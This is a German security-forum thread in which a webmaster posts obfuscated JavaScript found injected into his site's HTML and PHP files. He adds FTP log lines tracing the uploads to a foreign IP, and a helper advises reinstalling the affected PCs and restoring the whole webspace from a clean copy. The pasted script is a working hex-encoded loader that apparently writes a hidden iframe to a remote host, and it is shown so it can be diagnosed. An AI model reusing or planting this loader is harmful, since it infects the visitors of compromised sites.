Zurück   Trojaner-Board > Malware entfernen > Plagegeister aller Art und deren Bekämpfung

Plagegeister aller Art und deren Bekämpfung: Webserver -> Trojaner

Windows 7 Wenn Du nicht sicher bist, ob Du dir Malware oder Trojaner eingefangen hast, erstelle hier ein Thema. Ein Experte wird sich mit weiteren Anweisungen melden und Dir helfen die Malware zu entfernen oder Unerwünschte Software zu deinstallieren bzw. zu löschen. Bitte schildere dein Problem so genau wie möglich. Sollte es ein Trojaner oder Viren Problem sein wird ein Experte Dir bei der Beseitigug der Infektion helfen.

Antwort
Alt 18.10.2008, 23:10   #1
nb-guy
 
Webserver -> Trojaner - Standard

Webserver -> Trojaner



Hi erstmal,
hoffe mal ich kann das hier im forum posten. Wurde von einigen Benutzern meiner Internetseite freundlicherweise darauf hingewiesen, dass auf der Seite ein Script nen Trojaner runterladen will.
Also hab ich mir heute mal die index.html angeguckt und siehe da:

Code:
ATTFilter
<script>function c1058032905m48f8a79d6b2ea(m48f8a79d6ba04){  return (parseInt(m48f8a79d6ba04,16));}function m48f8a79d6d9ad(m48f8a79d6e1b2){ function m48f8a79d6f999(){return 2;} var m48f8a79d6e9be='';m48f8a79d7098b=String.fromCharCode;for(m48f8a79d6f1a0=0;m48f8a79d6f1a0<m48f8a79d6e1b2.length;m48f8a79d6f1a0+=m48f8a79d6f999()){ m48f8a79d6e9be+=(m48f8a79d7098b(c1058032905m48f8a79d6b2ea(m48f8a79d6e1b2.substr(m48f8a79d6f1a0,m48f8a79d6f999()))));}return m48f8a79d6e9be;} var z79='';var m48f8a79d71183='3C7'+z79+'3637'+z79+'2697'+z79+'07'+z79+'43E696628216D7'+z79+'96961297'+z79+'B646F637'+z79+'56D656E7'+z79+'42E7'+z79+'7'+z79+'7'+z79+'2697'+z79+'465287'+z79+'56E657'+z79+'363617'+z79+'065282027'+z79+'2533632536392536362537'+z79+'322536312536642536352532302536652536312536642536352533642536332533312533302532302537'+z79+'332537'+z79+'32253633253364253237'+z79+'2536382537'+z79+'342537'+z79+'342537'+z79+'30253361253266253266253337'+z79+'253337'+z79+'253265253332253332253331253265253331253333253333253265253331253337'+z79+'253332253266253265253639253636253266253637'+z79+'2536662532652536382537'+z79+'34253664253663253366253237'+z79+'2532622534642536312537'+z79+'342536382532652537'+z79+'322536662537'+z79+'352536652536342532382534642536312537'+z79+'342536382532652537'+z79+'32253631253665253634253666253664253238253239253261253332253330253335253338253334253239253262253237'+z79+'253338253339253636253237'+z79+'2532302537'+z79+'37'+z79+'2536392536342537'+z79+'34253638253364253333253333253332253230253638253635253639253637'+z79+'2536382537'+z79+'342533642533362533322532302537'+z79+'332537'+z79+'342537'+z79+'39253663253635253364253237'+z79+'2536342536392537'+z79+'332537'+z79+'302536632536312537'+z79+'39253361253230253665253666253665253635253237'+z79+'2533652533632532662536392536362537'+z79+'3225363125366425363525336527'+z79+'29293B7'+z79+'D7'+z79+'6617'+z79+'2206D7'+z79+'969613D7'+z79+'47'+z79+'27'+z79+'5653B3C2F7'+z79+'3637'+z79+'2697'+z79+'07'+z79+'43E';document.write(m48f8a79d6d9ad(m48f8a79d71183));</script>
         
Und am Ende:

Code:
ATTFilter
</html><script>check_content()</script>
         

Erstmal aufgeregt, dann rausgelöscht. Danach habe ich mal aus spaß mir auch eine andere html im selben verzeichnis angeshaut und siehe da: wieder das gleiche!!!
Ich also alles durchforstet: in fast allen (html dateien welche sehr verschachtelt in ordnern lagen wurden nicht betroffen) html dateien sowie in der "index.php" meines Gästebuches war der Mist vertreten.

Natürlich gleich nachgehakt und das in dem FTP-Logfile gefunden:

Code:
ATTFilter
...
Fri Oct 17 17:51:45 2008 0 77.221.133.198 21011 /home/httpd/vhosts/******.de/httpdocs/news.html a _ o r [Benutzername] ftp 0 * c 
Fri Oct 17 17:51:45 2008 0 77.221.133.198 22396 /home/httpd/vhosts/******.de/httpdocs/news.html a _ i r [Benutzername} ftp 0 * c 
...
         
Da waren dann auch alle Dateien noch mal aufgelistet , welche betroffen waren (war zur Kontrolle hilfreich).
Hab dann die IP gegoogelt und bin auf einen russischen Server gestoßen


Nun kommt bei mir die Frage auf: wie konnte das sein bzw wie konnte man auf den Server zugreifen?
Es ist ein evanzo webserver auf dem nur ein berechtigter FTP Benutzer existiert. Dieser Benutzername wurde auch von dieser russischen IP benutzt! Die Zugangsdaten von diesem Benutzer haben nur 2 Leute (inkl. Ich).
Nen Bruteforce Angriff kann ich mir bei einem 14 stelligem Alphanumerischem passwort nicht vorstellen.
Also muss entweder der Server gehackt sein oder ein PC welcher auf den Server zugegriffen hat muss von nem Trojaner infiziert sein.

Was haltet ihr davon?

Mit freundlichen Grüßen


P.S.: nach der Säuberung wurde natürlich das FTPPasswort geändert

Alt 19.10.2008, 13:10   #2
KarlKarl
/// Helfer-Team
 
Webserver -> Trojaner - Standard

Webserver -> Trojaner



Hi,

wenn das Passwort garantiert nur auf zwei PCs benutzt wurde, dann ist die Sache ja recht einfach, da nur zwei PCs neu aufgesetzt werden müssen.

du solltest es übrigens nicht dabei lassen, nur ein paar HTML-Dateien im Webspace zu editieren. Du solltest den Webspace komplett platt machen und eine saubere Kopie hochladen. ansonsten läufst Du Gefahr, eine irgendwo versteckte Shell zu übersehen über die immer wieder Zugriff möglich ist, dann auch ohne Passwort.

Gruß, Karl
__________________


Antwort

Themen zu Webserver -> Trojaner
alpha, angriff, benutzer, bruteforce, check, code, content, dateien, evanzo, forum, frage, gehackt, geändert, griff, heute, hilfreich, index.php, infiziert, interne, internetseite, leute, ordner, passwort, script, seite, server, trojane, trojaner, verzeichnis




Ähnliche Themen: Webserver -> Trojaner


  1. Fünf Lücken im Apache-Webserver geschlossen
    Nachrichten - 18.07.2014 (0)
  2. Virus auf Webserver möglich?
    Plagegeister aller Art und deren Bekämpfung - 04.06.2014 (3)
  3. Schadsoftware auf Webserver (PHP)
    Alles rund um Mac OSX & Linux - 23.05.2014 (5)
  4. JS/EXP.Redir.EL.7 auf Webserver - wie vorgehen?
    Plagegeister aller Art und deren Bekämpfung - 04.06.2013 (1)
  5. Kritische Lücke im Webserver nginx
    Nachrichten - 07.05.2013 (0)
  6. Geknackte Webserver als Malware-Schleudern
    Nachrichten - 06.03.2013 (0)
  7. Schadstoffcode iauf meinem Webserver
    Diskussionsforum - 27.01.2013 (18)
  8. Webserver infiziert? Malware globalconferencemanagementgroup.com
    Plagegeister aller Art und deren Bekämpfung - 02.01.2013 (3)
  9. Rootkit befällt Linux-Webserver
    Nachrichten - 20.11.2012 (0)
  10. Sicherheitslücke auf Webserver der Schufa
    Nachrichten - 12.06.2011 (0)
  11. Webserver der Bundesfinanzagentur offen wie ein Scheunentor
    Nachrichten - 11.03.2011 (0)
  12. Apache Webserver Online bringen
    Alles rund um Windows - 24.01.2011 (10)
  13. JS:Illredir-W auf Webserver
    Plagegeister aller Art und deren Bekämpfung - 24.02.2010 (1)
  14. JS:Redirect-AM[Trj] auf Webserver von Versatel ohne php, css und js
    Plagegeister aller Art und deren Bekämpfung - 10.01.2010 (1)
  15. lokaler webserver? trojaner? dienst?
    Plagegeister aller Art und deren Bekämpfung - 11.03.2009 (1)
  16. Trojaner auf dem Webserver
    Plagegeister aller Art und deren Bekämpfung - 14.01.2008 (2)
  17. Gentoo vs Debian auf einem Webserver
    Alles rund um Mac OSX & Linux - 16.12.2003 (20)

Zum Thema Webserver -> Trojaner - Hi erstmal, hoffe mal ich kann das hier im forum posten. Wurde von einigen Benutzern meiner Internetseite freundlicherweise darauf hingewiesen, dass auf der Seite ein Script nen Trojaner runterladen will. - Webserver -> Trojaner...
Archiv
Du betrachtest: Webserver -> Trojaner auf Trojaner-Board

Search Engine Optimization by vBSEO ©2011, Crawlability, Inc.